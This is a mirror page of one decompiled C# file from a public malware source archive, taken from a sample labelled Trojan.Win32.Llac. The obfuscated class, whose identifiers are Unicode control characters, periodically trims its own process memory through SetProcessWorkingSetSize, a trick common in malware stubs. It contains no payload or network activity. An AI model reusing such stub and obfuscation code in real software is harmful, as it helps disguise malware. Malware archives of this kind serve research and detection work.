mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 21:05:28 +00:00
f2ac1ece55
add
87 lines
1.9 KiB
C#
87 lines
1.9 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: .
|
||
// Assembly: Stub, Version=2.0.0.2, Culture=neutral, PublicKeyToken=null
|
||
// MVID: 18A6455A-DBC9-4D4B-8699-BEBEFCABEF8D
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Llac.aimt-d60eebfa06f055ff7e8bef8d4507b58d2922f6e9f6682bbf0d9c0884bab4acb2.exe
|
||
|
||
using System;
|
||
using System.Diagnostics;
|
||
using System.Runtime.InteropServices;
|
||
using System.Windows.Forms;
|
||
|
||
namespace \u0001
|
||
{
|
||
internal sealed class \u0001
|
||
{
|
||
private static \u0001.\u0001 \u0001;
|
||
private long \u0001 = DateTime.Now.Ticks;
|
||
|
||
[DllImport("kernel32", EntryPoint = "SetProcessWorkingSetSize")]
|
||
private static extern int \u0002(
|
||
IntPtr process,
|
||
int minimumWorkingSetSize,
|
||
int maximumWorkingSetSize);
|
||
|
||
private void \u0002()
|
||
{
|
||
try
|
||
{
|
||
using (Process currentProcess = Process.GetCurrentProcess())
|
||
{
|
||
if (false)
|
||
return;
|
||
\u0001.\u0001.\u0002(currentProcess.Handle, -1, -1);
|
||
}
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
}
|
||
|
||
private void \u0002(object sender, EventArgs e)
|
||
{
|
||
try
|
||
{
|
||
long num1 = DateTime.Now.Ticks;
|
||
long num2;
|
||
long num3;
|
||
while (true)
|
||
{
|
||
num2 = num1;
|
||
num3 = num2 - this.\u0001;
|
||
if (false)
|
||
num1 = num3;
|
||
else
|
||
break;
|
||
}
|
||
if (num3 <= 10000000L)
|
||
return;
|
||
this.\u0001 = num2;
|
||
this.\u0002();
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
}
|
||
|
||
private \u0001()
|
||
{
|
||
Application.Idle += new EventHandler(this.\u0002);
|
||
this.\u0002();
|
||
}
|
||
|
||
public static void \u0003()
|
||
{
|
||
try
|
||
{
|
||
if (Environment.OSVersion.Platform != PlatformID.Win32NT)
|
||
return;
|
||
\u0001.\u0001.\u0001 = new \u0001.\u0001();
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
}
|
||
}
|
||
}
|